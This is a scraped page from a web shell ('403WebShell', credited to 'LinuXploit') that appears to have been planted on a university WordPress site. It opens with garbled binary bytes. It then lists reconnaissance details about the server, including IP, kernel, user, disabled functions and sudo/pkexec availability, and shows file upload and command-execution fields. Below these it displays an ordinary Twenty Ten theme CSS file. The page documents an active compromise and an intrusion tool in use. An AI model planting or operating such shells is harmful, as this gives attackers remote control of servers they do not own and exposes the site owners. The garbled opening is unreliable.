h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/twentyten/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/twentyten//editor-blocks.css
/*
Theme Name: Twenty Ten
Description: Used to style blocks in the editor.
*/

/*--------------------------------------------------------------
>>> TABLE OF CONTENTS:
----------------------------------------------------------------
1.0 General Typography
2.0 General Block Styles
3.0 Blocks - Common Blocks
4.0 Blocks - Formatting
5.0 Blocks - Widgets
--------------------------------------------------------------*/

/*--------------------------------------------------------------
1.0 General Typography
--------------------------------------------------------------*/

.edit-post-visual-editor .editor-block-list__block,
.edit-post-visual-editor .editor-block-list__block p,
.editor-default-block-appender textarea.editor-default-block-appender__content {
	font-size: 16px;
}

.editor-default-block-appender textarea.editor-default-block-appender__content {
	font-family: Georgia, "Bitstream Charter", serif;
}

.edit-post-visual-editor .editor-block-list__block .mce-content-body,
.wp-block-freeform.block-library-rich-text__tinymce p,
.wp-block-freeform.block-library-rich-text__tinymce li {
	line-height: 1.5;
}

.edit-post-visual-editor .editor-block-list__block {
	color: #1a1a1a;
}

.editor-post-title__block .editor-post-title__input {
	color: #000;
	font-family: "Helvetica Neue", Arial, Helvetica, "Nimbus Sans L", sans-serif;
	font-size: 21px;
	font-weight: bold;
	line-height: 1.3em;
}

.edit-post-visual-editor .editor-block-list__block h1 {
	font-size: 32px;
}

.edit-post-visual-editor .editor-block-list__block h2 {
	font-size: 24px;
}

.edit-post-visual-editor .editor-block-list__block h3 {
	font-size: 19px;
}

.edit-post-visual-editor .editor-block-list__block h4 {
	font-size: 16px;
}

.edit-post-visual-editor .editor-block-list__block h5 {
	font-size: 13px;
}

.edit-post-visual-editor .editor-block-list__block h6 {
	font-size: 11px;
}

/*--------------------------------------------------------------
2.0 General Block Styles
--------------------------------------------------------------*/

/* Main column width */

.wp-block {
	max-width: 670px; /* 640px + 30px to account for padding */
}

/* Link styles */

.edit-post-visual-editor a,
.editor-block-list__block a,
.wp-block-freeform.block-library-rich-text__tinymce a {
	color: #0066cc;
}

/* List styles */

.edit-post-visual-editor ul:not(.wp-block-gallery),
.editor-block-list__block ul:not(.wp-block-gallery),
.block-library-list ul,
.edit-post-visual-editor ol,
.editor-block-list__block ol,
.block-library-list ol.editor-rich-text__tinymce {
	margin: 0 0 18px 1.5em;
	padding: 0;
}

.edit-post-visual-editor ul:not(.wp-block-gallery),
.editor-block-list__block ul:not(.wp-block-gallery),
.block-library-list ul {
	list-style: square;
}

.edit-post-visual-editor ol,
.editor-block-list__block ol,
.block-library-list ol {
	list-style: decimal;
	margin-left: 1.5em;
}

.edit-post-visual-editor ul:not(.wp-block-gallery) li,
.editor-block-list__block ul:not(.wp-block-gallery) li,
.edit-post-visual-editor ol li,
.editor-block-list__block ol li,
.block-library-list li {
	margin-bottom: 0;
}

.edit-post-visual-editor ul:not(.wp-block-gallery) li > ul,
.editor-block-list__block ul:not(.wp-block-gallery) li > ul,
.block-library-list li > ul,
.edit-post-visual-editor li > ol,
.editor-block-list__block li > ol,
.block-library-list li > ol {
	margin-bottom: 0;
}

.rtl .edit-post-visual-editor ul:not(.wp-block-gallery),
.rtl .editor-block-list__block ul:not(.wp-block-gallery),
.rtl .block-library-list ul,
.rtl .edit-post-visual-editor ol,
.rtl .editor-block-list__block ol,
.rtl .block-library-list ol {
	margin-left: 0;
	margin-right: 1.25em;
	padding: 0;
}

/* Caption styles */

[class^="wp-block-"] figcaption {
	color: #777;
	font-family: "Helvetica Neue", Arial, Helvetica, "Nimbus Sans L", sans-serif;
}

/* Code styles */

.wp-block-freeform.block-library-rich-text__tinymce code {
	background: transparent;
}

/* Quote styles */

.wp-block-freeform.block-library-rich-text__tinymce blockquote {
	border: 0;
	padding: 0 3em;
}

/* Table styles */

.editor-block-list__block tr th,
.editor-block-list__block tr th a {
	font-family: "Helvetica Neue", Arial, Helvetica, "Nimbus Sans L", sans-serif;
}

/* Definition List styles */

.editor-block-list__block dd {
	margin-left: 0;
	margin-right: 0;
}

/*--------------------------------------------------------------
3.0 Blocks - Common Blocks
--------------------------------------------------------------*/

/* Paragraph */

p.has-drop-cap:not(:focus)::first-letter {
	font-size: 5em;
	margin-top: 0.1em;
}

/* Image */

.wp-block-image {
	margin-bottom: 20px;
}

.wp-block-image figcaption {
	display: block;
	margin: -7px 0 0;
	padding: 9px 9px 1.0em;
	text-align: center;
}

/* Gallery */

.editor-block-list__block .wp-block-gallery {
	margin: 0 0 24px;
}

/* Quote */

.wp-block-quote {
	border: 0;
	padding: 0 3em;
}

.wp-block-quote:not(.is-large):not(.is-style-large) {
	border: 0;
	padding: 0 3em;
}

.wp-block-quote .wp-block-quote__citation {
	font-size: 16px;
	font-weight: 600;
}

.wp-block-quote.is-large .wp-block-quote__citation,
.wp-block-quote.is-style-large .wp-block-quote__citation  {
	font-size: 18px;
}

/* Cover */

.wp-block-cover-image-text,
.wp-block-cover-text {
	font-size: 32px;
}

/* File */

.wp-block-file .wp-block-file__textlink .editor-rich-text__tinymce {
	color: #0066cc;
	font-size: 16px;
	text-decoration: underline;
}

/*--------------------------------------------------------------
4.0 Blocks - Formatting
--------------------------------------------------------------*/

/* Code */

.wp-block-code {
	border: 0;
	padding: 0;
}

/* Pullquote */

.wp-block-pullquote blockquote > .editor-rich-text p {
	font-size: 1.5em;
}

.wp-block-pullquote .wp-block-pullquote__citation {
	color: inherit;
	font-size: inherit;
	font-weight: 600;
	text-transform: none;
}

/* Table */

.wp-block-table tr:nth-child(odd) td {
	background: #f2f7fc;
}

.wp-block-table th .wp-block-table__cell-content {
	color: #777;
	font-family: "Helvetica Neue", Arial, Helvetica, "Nimbus Sans L", sans-serif;
}

.editor-block-list__block .wp-block-table tr td {
	padding-bottom: 0;
	padding-top: 0;
}

/*--------------------------------------------------------------
5.0 Blocks - Widgets
--------------------------------------------------------------*/

/* Latest Comments */

.editor-block-list__block .wp-block-latest-comments {
	margin: 0 0 24px;
}

.rtl .edit-post-visual-editor .wp-block-latest-comments {
	margin-right: 0;
}

/* Latest Posts */

.edit-post-visual-editor .editor-block-list__block .wp-block-latest-posts.is-grid {
	list-style: none;
	margin-left: 0;
	margin-right: 0;
}

.edit-post-visual-editor .wp-block-latest-posts.is-grid li {
	margin-bottom: 1em;
}

Youez - 2016 - github.com/yon3zu
LinuXploit